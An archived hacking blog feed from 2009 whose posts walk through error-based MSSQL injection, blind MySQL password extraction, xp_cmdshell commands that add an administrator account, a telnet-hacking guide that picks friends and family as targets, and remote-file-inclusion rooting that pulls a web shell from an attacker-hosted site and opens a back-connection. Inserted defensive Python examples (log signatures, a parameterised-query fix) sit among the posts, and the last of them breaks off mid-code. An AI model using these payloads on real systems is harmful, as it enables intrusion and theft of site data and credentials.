:: [ Ethical mafia ] ::
Blog feed, last updated 2024-03-13


Hacking Shop Admin [ beware before trying noobs ]
Published 2009-07-23

Get the first table:

select top 1 table_name from information_schema.tables order by table_name

Example:

http://site.com/ProductList.cfm?CatDisplay=371%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20order%20by%20table_name))--sp_password

Get the second table:

select top 1 table_name from information_schema.tables where table_name not in (select top n table_name from information_schema.tables order by table_name) order by table_name

Demo:

Table 2:

http://site.com/ProductList.cfm?CatDisplay=371 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables order by table_name) order by table_name))--sp_password

Table 3:

http://site.com/ProductList.cfm?CatDisplay=371 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (select top 2 table_name from information_schema.tables order by table_name) order by table_name))--sp_password

Get the first column of a table (ten_table stands for the table name; it is a string, so convert it to ASCII):

select top 1 column_name from information_schema.columns where table_name=ten_table order by column_name

Get the next column (after the first n):

select top 1 column_name from information_schema.columns where table_name=ten_table and column_name not in (select top n column_name from information_schema.columns where table_name=ten_table order by column_name) order by column_name

Once you have extracted the tables and their important columns, you retrieve the data as usual with the following:

Retrieve the latest order:

SELECT top 1 convert(varchar, convert(varchar, isnull(convert(varchar, T[1].C[1,1]), char(32))) + char(32) + char(124) + char(32) + convert(varchar, isnull(convert(varchar, T[1].C[1,2]), char(32))) + char(32) + char(124) + char(32) + ... + char(32) + char(124) + char(32) + convert(varchar, isnull(convert(varchar, T[n].C[n,m]), char(32))))
FROM T[1], T[2], ..., T[n]
WHERE T[1].orderId=T[2].orderId and T[2].orderId=T[3].orderId and ... and T[n-1].orderId=T[n].orderId
ORDER BY T[1].orderId desc

Get the n-th order:

SELECT top 1 convert(varchar, convert(varchar, isnull(convert(varchar, T[1].C[1,1]), char(32))) + char(32) + char(124) + char(32) + convert(varchar, isnull(convert(varchar, T[1].C[1,2]), char(32))) + char(32) + char(124) + char(32) + ... + char(32) + char(124) + char(32) + convert(varchar, isnull(convert(varchar, T[n].C[n,m]), char(32))))
FROM T[1], T[2], ..., T[n]
WHERE T[1].orderId=T[2].orderId and T[2].orderId=T[3].orderId and ... and T[n-1].orderId=T[n].orderId and T[1].orderId=n

Here T[i] is the i-th table, C[i,j] is the j-th column of table T[i], and orderId is the order-number column that each table carries.


Fake Your IP with SSH Tunnelier and an SSH Host Account
Published 2009-07-23

First we need to install the Bitvise Tunnelier software (required) and an SSH host account (or an SSH File Save).
- You can download Tunnelier for FREE at www.bitvise.com
- Then install it on your PC
Download link:
http://dl.bitvise.com/Tunnelier-Inst.exe
Mirror:
http://dl.bitvise.com.s3-external-3.amazonaws.com/Tunnelier-Inst.exe

- Here I show how to use the SSH SOCKS proxy with an SSH File Save.
- That is the SSH File Save; open it. With an SSH File Save you need to do nothing more than run it by clicking Login.
- Before using it, check which port the SSH File Save uses: click Services and see the port ^^ ... here it is 7210.
- OK, now run the SSH File Save by clicking Login.
- OK, and it says succeeded (we are connected with the SSH host account).

Now change your browser settings to use SSH to fake your IP (we can minimize the SSH File Save).
- In the browser, the SOCKS host (SOCKS IP) must always be:
127.0.0.1
- And the port is the SSH port. The SOCKS type is SOCKS5.
- Then check our IP after faking at http://ip-address.domaintools.com
- And we are done ^^

Remember to keep the SSH File Save running. How do you know whether the SSH is running or not? It's very simple: just look for the small SSH SOCKS icon in the taskbar ...
When you need to stop faking through the SSH SOCKS proxy, just do as I do ...
And we are done.


SQL Injection Vulnerabilities in MSSQL
Published 2009-07-09

This method of SQL injection in Microsoft SQL Server involves injecting a query that attempts to convert the result of an SQL query to an integer value using convert(). The conversion fails, and the resulting error message includes the result of the SQL query. This allows an attacker to execute SQL queries on the server.

To test whether a variable is vulnerable to this type of injection, insert a ' onto the end of the value of a variable that is used with the db server, for example: index.asp?id=100'. If the site is vulnerable to this type of attack, the page should produce an error message that looks similar to this:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string

This allows you to execute SQL queries to do tasks such as mapping out the tables and columns in the database, letting an attacker get their hands on all the information inside the DB.

convert(int, (select top 1 name from sysobjects where xtype='U' and name>'tablename'))

replacing tablename each time with the table name you get. Say, for example, that running that query gave you the table 'news'; you'd then run convert(int, (select top 1 name from sysobjects where xtype='U' and name>'news')), which would give you the next table in the database, and so on.

Then it's possible to get the columns inside a table by using:

convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))

obviously replacing TABLE with the table of your choice, and colid=1, then colid=2, etc. until all columns have been found.
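Both the error-based payloads in this post and the information_schema enumeration in the Hacking Shop Admin post above leave distinctive fragments in web-server access logs. The following added example (not from the blog) scans constructed log lines for those fragments after URL-decoding; the site paths, the NUMERIC_PARAMS set and the log lines are assumptions made for the demo.

```python
"""Detect the error-based MSSQL injection probes shown in these posts in
web-server access logs.  Added example (not from the blog); the log lines,
hosts and parameter names below are constructed for the demo."""
import re
from urllib.parse import unquote_plus, urlsplit

# Fragments seen in the payloads on this page.  Applied to each query-string
# value after URL-decoding, comment stripping and whitespace folding.
SIGNATURES = {
    "error_based_convert": r"\bconvert\s*\(\s*int\s*,",
    "schema_enum": r"\binformation_schema\.(tables|columns)\b",
    "sysobjects_enum": r"\bsys(objects|columns)\b",
    "stacked_cmdshell": r";\s*exec\b.*\bxp_cmdshell\b",
    "trace_hiding_comment": r"--\s*sp_password\b",   # the --sp_password suffix used above
    "user_probe": r"\bconvert\s*\(\s*int\s*,\s*user\s*\)",
}

# Parameters this (hypothetical) site expects to be purely numeric.
NUMERIC_PARAMS = {"id", "catdisplay", "vuln"}

# Common Log Format; the constructed lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def normalise(value):
    """URL-decode twice (catches double encoding), drop /* */ comments,
    fold whitespace and lower-case so the regexes stay simple."""
    text = unquote_plus(unquote_plus(value))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).strip().lower()


def split_query(query):
    """Split on '&' only (never ';'), since ';' is part of stacked queries."""
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote_plus(name).lower(), value


def analyse_request(target):
    """Return the sorted list of rule names that fire for one request target."""
    findings = set()
    for name, raw in split_query(urlsplit(target).query):
        value = normalise(raw)
        for rule, pattern in SIGNATURES.items():
            if re.search(pattern, value):
                findings.add(rule)
        if name in NUMERIC_PARAMS and not value.isdigit():
            findings.add("non_numeric_" + name)
            if value.endswith("'"):       # the index.asp?id=100' test from this post
                findings.add("quote_probe")
    return sorted(findings)


def scan_log(lines):
    """Return one record per log line that triggers at least one rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse_request(m["target"])
        if findings:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "target": m["target"], "findings": findings})
    return hits


# Constructed sample lines: a benign request, a free-text search, and the
# probes from the posts above with spaces and quotes percent-encoded as a
# server would log them.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jul/2009:10:40:01 -0700] "GET /ProductList.cfm?CatDisplay=371 HTTP/1.1" 200 8812',
    '203.0.113.5 - - [23/Jul/2009:10:40:02 -0700] "GET /index.asp?id=100%27 HTTP/1.1" 500 312',
    '203.0.113.5 - - [23/Jul/2009:10:40:03 -0700] "GET /ProductList.cfm?CatDisplay=371%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20order%20by%20table_name))--sp_password HTTP/1.1" 500 298',
    '203.0.113.5 - - [23/Jul/2009:10:40:04 -0700] "GET /page.asp?vuln=convert(int,user) HTTP/1.1" 500 301',
    '203.0.113.5 - - [23/Jul/2009:10:40:05 -0700] "GET /page.asp?vuln=1;exec%20master..xp_cmdshell%20%27dir%27;-- HTTP/1.1" 200 8812',
    '198.51.100.7 - - [23/Jul/2009:10:41:00 -0700] "GET /search.asp?q=select+top+1+books HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ", ".join(hit["findings"]), hit["target"][:60])
```

Matching on decoded values is what makes the `%20`-encoded payload above and its plain-space twin hit the same rules.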
Of course, with basic SQL knowledge you can then extend this a lot.

If the user running the SQL server is 'dbo' (database owner), this opens up a lot more possibilities, including blind command execution using EXEC. To test whether a server is running under DBO you'd run:

page.asp?vuln=convert(int,user)

While it's DBO, you can use this privilege to execute commands on the server, allowing you to do things such as start or stop services, add a user account to the system and even escalate privileges to administrator, as the db server is running as sysadmin.

page.asp?vuln=1;exec master..xp_cmdshell 'net users username password /add';--
page.asp?vuln=1;exec master..xp_cmdshell 'net localgroup Administrators username /add';--

After this, it's pretty useful to check whether remote desktop, telnet, etc. are running.

If not, you could start them yourself.

This shows how clearly stupid it would be to run your db under 'dbo'.

A few things you can do to prevent this type of SQL attack are filtering out characters such as quote marks (single and double), the semicolon, and even slash and backslash, and just generally tightening user input.


Cable Modem uncapping
Published 2009-07-09

In the beginning there was dial-up, and it was slow; then came broadband in the form of cable, which redefined how we access the internet, share information, and communicate with each other online. Hacking the Cable Modem goes inside the device that makes Internet via cable possible and, along the way, reveals secrets of many popular cable modems, including products from Motorola, RCA, WebSTAR, D-Link and more.

Inside Hacking The Cable Modem, you'll learn:
# the history of cable modem hacking
# how a cable modem works
# the importance of firmware (including multiple ways to install new firmware)
# how to unblock network ports and unlock hidden features
# how to hack and modify your cable modem
# what uncapping is and how it makes cable modems upload and download faster

Written for people at all skill levels, the book features step-by-step tutorials with easy-to-follow diagrams, source code examples, hardware schematics, links to software (exclusive to this book!), and previously unreleased cable modem hacks.

Download now: http://206e5027.zxxo.net


Telnet Hacking
Published 2009-07-09

Chapter One: Introduction

1. Introduction
2. Warnings
3. Copyright Information
4. Disclaimer
5. Who Am I?
6. Shout Outs

Chapter Two: Before We Start

1. What The Hell Is Telnet?
2. What Was The Original Purpose?
3. What Can I Do With It?
4. Is It Illegal?
5. Will I Go To Jail?
6. Is It Fun?

Chapter Three: Getting Started

1. Possible Targets
2. Is The Target Alive?
3. Scanning For Ports
4. Getting An IP
4.A. Messenger
4.B. Social Engineering It
4.C. Your Firewall

Chapter Four: Connecting

1. Connecting To An IP

Chapter Five: What To Do After You're Connected

1. Doing Something!
2. FTP

Chapter Six: Cracking A Pass

1. Brutus
2. Password Lists
3. Default Passwords

Chapter Seven: FAQ's

1. 'I Get A Blank Screen After Connecting!'
2. 'It Says It Can't Connect! WTF!'
3. 'My Computer Flips Off After Connecting!'
4. 'Where Do I Type My Commands?'
5. 'I Got Arrested!!! Can I Sue You?'

Chapter Eight: Wrapping Up

1. Contact Me
2. TGS


~`CHAPTER ONE: INTRODUCTION`~

~`Introduction`~

Hey. I decided that my old telnet tutorial was not sufficient, so I decided to redo it, among all the other work I have to do. This will provide a step-by-step method to: connect to an IP, connect to a certain port, decide if the port is responsive, find commands that you can use on this 'box', use the commands, crack a password using 'Brutus', find targets, and many other things. It will also include many pictures that you can use as a reference. Remember, all command prompts are different; don't be discouraged.

~`Warnings`~

This is a form of hacking. Whether or not you damage a computer, you are committing a felony. Connecting to a computer or something of the kind without permission is punishable by law and will get you corn holed in a state prison by a 365 pound, one-eared black man by the name of Bubba. You can be held to criminal, as well as civil, suits for your actions.

Doing this is a good way to get enemies, too. Remember, there are hundreds of hacking groups out there, and hundreds of hackers; there's a chance that you could be fucking with a hacker of a group, and that is not a fun thing to do.

~`Copyright Information`~

This, or any portion of this paper, is allowed to be duplicated. You may host it on your site, as long as it stays intact.
Failure to comply with this will result in swift legal action.

~`Disclaimer`~

I cannot be held responsible for your actions because of this. I will not take responsibility. If you don't agree with this, DO NOT READ FURTHER. I do not condone hacking, or any other form of illegal behavior. Also, you will encounter a number of IPs in this forum; DO NOT USE ANY OF THEM. The ones I used for demonstration I did not hurt, and I take no responsibility if you do use them. You have been warned.

NOTE: I used www.sjms.org (the website of a fine military academy) in some of my examples. I mean no harm to come to www.sjms.org. I did not hack www.sjms.org, and I don't recommend you do it either. I take no responsibility if you do, though.

~`Who Am I?`~

I am Errorised of the www.waushare.com forums. If you'd like to get hold of me, do so at koft@habbocommunity.co.uk

~`Shout Outs`~

Hey, I'd like to say hello to my good buddies: Wau / Placi / Maki / Unstable / Phantom / BOOSTER / Chaos Zero / T1M3 / M4K3 / RedFox / Mr.Wolves / h3r3t1c and whoever else I forgot (due to the pot). These are all buddies, as well as PSP-Hacks members.

~`CHAPTER TWO: BEFORE WE START`~

~`What Was The Original Purpose Of Telnet?`~

Telnet was originally made for someone to do all sorts of things. From checking your mail to connecting to your company's server while on a business trip, telnet does it all.
The makers of it had a dream in mind that the average person could deal with command/text based programs. But of course when the masses got into it and every brother and sister bought a computer, Windows was made, which totally destroyed most text based programs. Now fucking idiots run computers and companies with computers, and can't even deal with a damn telnet program!

~`What Can I Do With It?`~

Although Telnet has died for the business men, it is still growing quickly with the not-so-trustful person. For the hacker, Telnet is the hammer in the toolbox. Telnet is one of the most worldwide programs among hackers, as well as other fun-loving people. When you finally hit that golden hack after your first long hours of struggling with telnet (not!), you are god!

You can change other people's passwords, snoop on e-mails, forge dirty e-mails to one's lover,

~`Is It Illegal?`~

Two words: HELL YES. Hacking is the most illegal thing one can do on the internet. Do not be mistaken, it's quite illegal.

~`Will I Go To Jail?`~

Only if you're caught. This is why it's good to encrypt your entire hard drive; if they can't get anywhere in your hard drive, how the hell are they going to charge you with anything? It is very good to be paranoid. My computer is a vault. The military runs 1800-bit encryption tops. The average bit encryption for any given file in my computer is around 7000, Triple Blowfish encrypted. There's also a shredder that hides in the startup registry that I made in a batch file; it hides there and if you don't turn it off within 15 seconds of starting up, bye bye computer and bye bye evidence. It's always good to be paranoid.

~`Is It Fun?`~

Despite my comments about jail, it is quite fun.
Most hackers do what they do for the simple thrill of knowing secrets that no one's supposed to know. Having inside information on people who they barely know or care about. Knowing top secret information that only god and the president are supposed to know, now that's fun!

~`CHAPTER THREE: GETTING STARTED`~

~`Possible Targets`~

A target is a person, place, or thing (kind of like a noun, eh?) which you are planning on attacking. A target can be anyone! Common targets include: family, friends, government, phone companies, and former attackers. Normally the first target is a friend or family member, someone who's not so smart and someone you know for a fact has no security. Security just gets in the way. '7337' hackers learn to deal with security; newbies fall into the trap. So for now stick with someone easy.

~`Is The Target Alive?`~

Go to the command prompt (or MS-DOS) and type ping 0.0.0.0 (replacing the zeros with the real IP). If it returns, then the computer is connected to the internet. If it says that it's lost, then the computer is offline (duh!).

~`Scanning For Ports`~

We will be using Blues Port Scanner to scan for ports. You can get Blues Port Scanner at download.com or www.library.2ya.com. It is about 400 KB, not too big.
You scan an IP for ports by pasting (CTRL V) the IP in both boxes at the top. This makes it scan only that IP. You then put in the range of ports which you wish to scan.

The more you scan, the more of a chance they will notice your movements, but do as you please.

~`Getting An IP`~

IP is short for Internet Protocol. Each computer has an IP. Getting someone's IP can be as easy as asking for it.
Here's a few ways:

Messenger:

OK, so you have MSN Messenger. You're a 'bad mofo', a 'rough rider'; now it's time to get what you need from your victim. The first thing to do is build trust. It would be wise to do this on someone you know will trust you enough to buy into your shit. Here's how you get their IP:

1. Send them a file through MSN (or whatever they have). It can be anything: a game, a dead hamster, a naked picture of yourself, whatever.

2. Once they accept, go into Command Prompt and type "netstat".

3. With a bit of hunting and picking you should be able to find their IP in the box.

Social Engineering:

Social Engineering is a fancy term that people use to describe smooth talkers. Social engineers are slick, smooth, smart, and know what they're talking about. They get into the part before attacking; they have great social skills and are easy people to trust. Social engineers build up a nice level of trust, the more the better, until they get the information they want.
Once, on an SE 'field trip' with a friend of mine, we actually got dressed up to walk to a payphone and make the attack that we'd been building trust for for months. It was worth it.

But anyway, back to the subject.

Usually, all you need to do is ask the person. If they know better than to give you the IP if you flat out ask them, then they will know better than to give it if you try to scare it out of them. Get 'em to go to ipchicken.com and give you the numbers in the blue letters.

Your Firewall:

If you have a firewall, then chances are you've seen someone trying to scan you for open ports. If you use Black ICE, all the better.
I suggest you download it at www.library.2ya.com.

What Black ICE does is gather up all the attempts to port probe you, connect to your computer, or anything else, and stick them in a database for further use. You can easily pick out targets from the list and use them at your will.

Double-click on the person whose IP you wish to get, and on the right it gives you the IP AND the DNS! How nice, eh?

~`CHAPTER FOUR: CONNECTING`~

~`Connecting To An IP`~

OK, so you've got your list of open ports on the computer. For this demonstration I'll be using someone who attempted to hack me a while back. After scanning a few thousand ports, we come up with this list. Now not all of these allow connections. The ones labeled with a red box next to them are 'dead' ports for the telnet program. This is usually because they only communicate using a certain 'language' that Telnet doesn't support. When you try to connect to these you get a blank screen with dashes where you try to type (see below). The listings labeled with a green box next to them allow connections and will talk to you without having to give it a user or pass. The ones labeled with a blue box next to them are responsive, are not dead, but require authentication before you're allowed to connect. If you really need into this computer and they've got password-protected ports, there's a section later in the paper that tells you how to get in. So anyway, let's focus on the responsive port. This is unfortunately the SMTP port (Simple Mail Transfer Protocol). Although it does not allow a significant amount of access to this person's computer without knowing advanced things, it does give us a good basis for a demonstration in telnetting.
Below will show you step by step how to connect and do other things with this port.

1. Connect to the computer by typing "telnet 0.0.0.0 25" in Command Prompt/MS-DOS. You should replace the "0.0.0.0" with the IP address you wish to connect to, and the 25 with the specific port you plan on connecting to. For this demonstration, I will be using the IP 161.58.163.4 and the port 25. So the command should read "telnet 161.58.163.4 25". There's no special place to type (as I've received many e-mails questioning this); when you type, it should show up at the bottom.

2. Press enter.

Congratulations! You just made your first connection! Although it's not a quantum leap in the exploration of computer security, it's a start.

~`CHAPTER FIVE: WHAT TO DO AFTER YOU'RE CONNECTED`~

~`Doing Something!`~

Alright, so you've got your open connection on an open port. It's best to keep the connection time down to a minimum to reduce their chance of noticing. I'll now demonstrate what to do after you're connected.

1. Generically speaking, typing help will give you a list of all the commands supported for that box. However, some require you to log on before doing so; what a drag!
Alright, after typing help this is how it responded.

You see that there's a nice listing of commands you can use. Since this port is not pass-protected, you have no worries about restrictions. Typing "help" and then the command which you want help on will make it elaborate, which is a great feature for a newbie! This is a pic of me asking it to elaborate on a few things.

2. You can never forget to say "hello".
It's quite rude to run through someone's home (computer) without even introducing yourself. This young lady was much nicer after I said "helo" to it.

[NOTE: I lost the pics and I'm too fucking lazy to make a helo pic... I'm sure you're smart enough to figure it out]

3. Use the commands in the box to figure out what you want to do. Since every computer and port is different, it is impossible for me to show you every single thing you can do. Learn to get off your bum and ask it what some of the commands mean; it's a good learning tool.

~`FTP`~

You can also connect to port 21 (FTP, or File Transfer Protocol) using telnet. Typing help will give you a listing that you nee

~`CHAPTER SIX: CRACKING A PASSWORD`~

~`Brutus`~

Brutus is a great brute force password cracker. It is easy to use for the newbie, fast, and reliable. You can find it by doing a search at www.google.com for "Brutus".

~`Password Lists`~

I'm proud to announce that two of our TGS members, The_IRS and Computer Geek, have combined many lists and have come out with a password list with a total of 2.1 passwords. You can download it here:
http://www.aftdesign.com/hacking/passwords.html

~`Default Passwords`~

You can find many lists of default passwords for any operating system on the web. Doing a search at google.com for "Default Password Lists" will come in handy. Here is a very good site with many default passwords that you can access in the meantime:
http://www.phenoelit.de/dpl/dpl.html

~`CHAPTER SEVEN: FAQ`~

1. "I Get A Blank Screen After Connecting!"

The port that you're connecting to is 'dead', or unusable. This could be due to a number of different things. For instance, let's say that you're trying to connect to someone's computer through telnet, on the Kazaa port (which I believe is 1214). This port is not designed to take packets (data) from the telnet program, and is specifically designed to give and receive packets (data) from the Kazaa program. This could be one of your problems. Trying to connect to a backdoor for a Sub7 program will also do the same.

2. "It Says I Can't Connect! WTF!"

This is because the port is either closed, or the computer is firewall-protected. As a newbie I wouldn't suggest messing with it.

3. "My Computer Flips Off After Connecting!"

I'll bet money you're using Windows. You are, aren't ya? I knew it! This is a Windows dump file. Either update Windows, get Linux, or forget hacking.

4. "Where Can I Type My Commands?"

Type a few letters to see where the commands will show up. Most likely it will be at the bottom of the Command Prompt/MS-DOS screen.

5. "I Got Arrested!!! Can I Sue You?"

NO! You read my disclaimer at the top.
I don't care who you are, I'm not taking responsibility.

RoMeO.....


Blind SQL Injection
Published 2009-07-09

<pre>
Blind injection is a little more complicated than classic injection, but it can be done :D

I must mention that there is a very good blind SQL injection tutorial by xprog, so it's not bad to read it :D

Let's start with the advanced stuff.

I will be using our example:

http://www.site.com/news.php?id=5

When we execute this, we see some page with articles on it, pictures etc...

Then, when we want to test it for a blind SQL injection attack:

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's OK.

Now the real test:

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

So if some text, picture or other content is missing on the returned page, then that site is vulnerable to blind SQL injection.

1) Get the MySQL version

To get the version in a blind attack we use substring, i.e.:

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

This should return TRUE if the version of MySQL is 4.

Replace 4 with 5, and if the query returns TRUE then the version is 5, i.e.:

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

When select doesn't work, we use a subselect, i.e.:

http://www.site.com/news.php?id=5 and (select 1)=1

If the page loads normally then subselects work.

Then we are going to see if we have access to mysql.user, i.e.:

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

If the page loads normally we have access to mysql.user, and then later we can pull some passwords using the load_file() function and OUTFILE.

3) Check table and column names

This is the part where guessing is your best friend :)

i.e.:

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1

(With limit 0,1 our query here returns 1 row of data, because the subselect returns only 1 row; this is very important.)

Then, if the page loads normally without content missing, the table users exists.
If you get FALSE (some article missing), just change the table name until you guess the right one :)

Let's say that we have found that the table name is users; now what we need is a column name.

The same as with the table name, we start guessing. Like I said before, try the common names for columns, i.e.:

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

If the page loads normally we know that the column name is password (if we get false then try common names or just guess).

Here we merge 1 with the column password, then substring returns the first character (,1,1).

4) Pull data from the database

We found the table users and the columns username and password, so we are going to pull characters from them.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

OK, this here pulls the first character from the first user in the table users.

substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ASCII value, and then we compare it with the greater-than symbol > .

So if the ASCII value of the character is greater than 80, the page loads normally (TRUE).

We keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

We get TRUE, keep incrementing.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

So the first character of the username is char(99). Using an ASCII converter we know that char(99) is the letter 'c'.

Then let's check the second character:

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that I changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

FALSE!!!

We know that the second character is char(105) and that is 'i'. We have 'ci' so far.

So keep incrementing until you get to the end.
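The 1=1 / 1=2 difference this post relies on is a property of how news.php builds its query, not of MySQL. The following added example (not from the post) reproduces that oracle against an in-memory SQLite table standing in for the news table, with the string-built query beside a bound-only version and a validated, parameterised one; the table, rows and function names are constructed for the demo.

```python
"""The 1=1 / 1=2 oracle from the post, reproduced against SQLite as a stand-in
for MySQL: a news.php-style query built by string concatenation beside a
bound-only and a validated, parameterised version.  Added example; the table
and rows are constructed for the demo."""
import sqlite3


def build_db():
    """In-memory stand-in for the site's news table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(5, "Article five"), (6, "Article six")])
    return db


def fetch_vulnerable(db, raw_id):
    """news.php?id=<raw_id> the vulnerable way: the raw parameter is pasted
    into the SQL text, so 'and 1=2' becomes part of the WHERE clause."""
    return db.execute("SELECT title FROM news WHERE id=" + raw_id).fetchall()


def fetch_bound_only(db, raw_id):
    """Binding alone: the whole string is compared to id as one value, so
    '5 and 1=1' matches nothing instead of being parsed as SQL."""
    return db.execute("SELECT title FROM news WHERE id=?", (raw_id,)).fetchall()


def fetch_parameterised(db, raw_id):
    """The fix: validate the type first, then bind the integer."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return db.execute("SELECT title FROM news WHERE id=?",
                      (int(raw_id),)).fetchall()


def has_boolean_oracle(fetch, db, base_id):
    """The post's detection test: does the page differ between 'and 1=1'
    and 'and 1=2'?  True means an attacker can ask yes/no questions."""
    try:
        true_page = fetch(db, base_id + " and 1=1")
        false_page = fetch(db, base_id + " and 1=2")
    except ValueError:
        return False          # input rejected outright: nothing to probe
    return true_page != false_page


if __name__ == "__main__":
    db = build_db()
    for name, fetch in [("vulnerable", fetch_vulnerable),
                        ("bound only", fetch_bound_only),
                        ("validated + bound", fetch_parameterised)]:
        print(f"{name:18} oracle: {has_boolean_oracle(fetch, db, '5')}")
```

Every later step in the post (version, table and column guessing, character extraction) is the same yes/no question asked repeatedly, so closing this one oracle closes all of them.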
(When >0 returns FALSE we know that we have reached the end.)

There are some tools for Blind SQL Injection; I think sqlmap is the best, but I'm doing everything manually,

because that makes you a better SQL INJECTOR :D



Hope you learned something from this paper.


Have FUN! (:

RoMeO.......


</pre>
.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com2tag:blogger.com,1999:blog-5375501825270350941.post-47924876709308373952009-07-06T23:57:00.001-07:002009-07-06T23:57:53.229-07:00
R.F.I. Rooting
<pre>You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

The aim of this tutorial is to give a very general picture of the process of rooting
a Linux server with Safe Mode: OFF.

-

Suppose that we have found a site with an R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

We can run a shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site (www.mysite.com, in the folder: shells).

After we enter the shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname -a in the command line.

To continue we must connect with a backconnection to the box. This can be done
two ways if we have the suitable shell.

We can use the Back-Connect module of the r57/c99 shell, or upload a backconnector
to a writable folder.

In most of the shells there is a backconnection feature without having to upload the
Connect Back Shell (or another shell in perl/c).
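The boolean probes walked through above (a subselect check, then ascii(substring(...)) compared against a moving threshold) leave a distinctive trace in web-server logs: one source, one path, many requests that differ only in a number, with responses falling into two sizes (the full page and the one with content missing). As an added example that is not code from the original post, this Python script flags that trace in constructed log lines; the log layout, IPs and response sizes are made up here.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined-log layout, made up for this example).
# 10.0.0.7 walks the ascii(substring()) threshold the way the post describes;
# 10.0.0.9 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [23/Jul/2009:10:40:01 -0700] "GET /news.php?id=5 HTTP/1.1" 200 5120
10.0.0.7 - - [23/Jul/2009:10:40:02 -0700] "GET /news.php?id=5%20and%20(select%201%20from%20users%20limit%200,1)=1 HTTP/1.1" 200 5120
10.0.0.7 - - [23/Jul/2009:10:40:03 -0700] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>80 HTTP/1.1" 200 5120
10.0.0.7 - - [23/Jul/2009:10:40:04 -0700] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>95 HTTP/1.1" 200 5120
10.0.0.7 - - [23/Jul/2009:10:40:05 -0700] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>98 HTTP/1.1" 200 5120
10.0.0.7 - - [23/Jul/2009:10:40:06 -0700] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>99 HTTP/1.1" 200 4096
10.0.0.7 - - [23/Jul/2009:10:40:07 -0700] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),2,1))>99 HTTP/1.1" 200 5120
10.0.0.9 - - [23/Jul/2009:10:41:00 -0700] "GET /news.php?id=7 HTTP/1.1" 200 5200
10.0.0.9 - - [23/Jul/2009:10:41:05 -0700] "GET /news.php?id=8 HTTP/1.1" 200 5310
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Fragments that only make sense inside an injected SQL expression.
SIGNATURES = {
    "ascii_substring": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
    "subselect_probe": re.compile(r"\(\s*select\b.*\blimit\s+\d+\s*,\s*1\s*\)", re.I),
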